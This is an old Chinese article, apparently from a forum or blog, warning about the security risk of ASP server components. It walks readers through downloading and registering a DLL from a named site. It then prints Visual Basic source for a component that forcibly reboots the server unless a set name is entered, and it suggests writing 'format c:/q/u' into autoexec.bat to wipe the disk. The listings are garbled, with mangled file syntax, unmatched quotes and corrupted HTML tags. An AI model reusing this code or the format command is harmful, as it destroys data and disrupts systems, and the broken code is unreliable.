Microsoft推出的asp以简单，易用，多功能，可扩充性等强大功能得到了网友和大多数网管的青睐，大有完全替代cgi的 势头，可是在这里也存在一些问题，如果在使用asp的话，你网络的安全同时也大大降低了！下面为大家举一个例子，请根据下面的步骤：

1，下载这个文件http：//home.gbsource.net/xuankong/dll.zip，解压缩后吧其中的test.dll文件拷贝到c：\windows\system（假如你使用的是NT的话，请拷贝到相应的目录中）；

2，接着打开“开始/运行”菜单输入“regsvr32test.dll”命令；

3，拷贝解压缩后的文件包中的那个index.asp到你的服务器目录（假如你使用的是PWS调试可以拷贝到“c:\inetpub\wwwroot“，NT请拷贝到相应的目录）；

4，换一台机器用IE浏览index.asp文件看一看（你看到的是犯错代码，可是实际上程序已经运行了），你再返回你的机器看一看c:\下面是不是多了一个文件？一个名为xuankong.dat的文件（其实如果我愿意，你的c:\autoexec.bat文件页可以被我打开并写进去一些像"format c:/q/u"等命令，那么等你下次重新启动的时候，嘿嘿。）。

下面我们来看一下究竟是咋回事，你刚才拷贝的那些dll文件实际上就是我使用Visul Basic5开发的一个主件：
　 1，打开VB5新建一个“ActiveX.dll”文件，吧下面的代码输入进去：
Private Declare Function ExitWindowsEx Lib "user32"_
(ByVal uFlags As Long,ByVal dwReserved As Long)_
As Long
Sub Xuankong() "请勿加上“private”
a$=InputBox("请输入你的姓名，假如你输入的是"xuankong""+Chr(13)+Chr(10)+
"则会在你的系统中生成一个"xuankong"文件"+Chr(10)+Chr(13)+
"不然你的机器可能会重起","请输入","xuankong")
If a$="xuankong" Then
Open "c:\xuankong.dat" For Append As #Write#1,"我的哥们，这是一个asp主件测试程序"
#Write#1,"hello world!this is a test"
#Write#1,"假如你看到这个文件测试就成功！"
else
ExitWindowsEx&H43,0使用API函数重新启动机器
End if
Close #1
End sub
　 2，把工程名改为dll，类模块改为test，然后把这个工程生成dll文件到c:\windows\system目录下面。
　 3，新建一个index.asp文件下面的代码输入进去：
$#@60;html$#@62;$#@60;head$#@62;$#@60;title$#@62;这是一个关于asp主件的测试$#@60;/title$#@62;$#@60;/head$#@62;
$#@60;body$#@62;
$#@60;% set rs=server.createobject("dll.test") %$#@62;
$#@60;% set rs1=rs.xuankong rs1.execute %$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;
　 4，拷贝index.asp到你的服务器内，根据上面的要领调试！

上面所说的是asp主件的安全问题！另外如果有些作者再写asp主件的时候不小心留下系统bug！那就更加不简单发现了！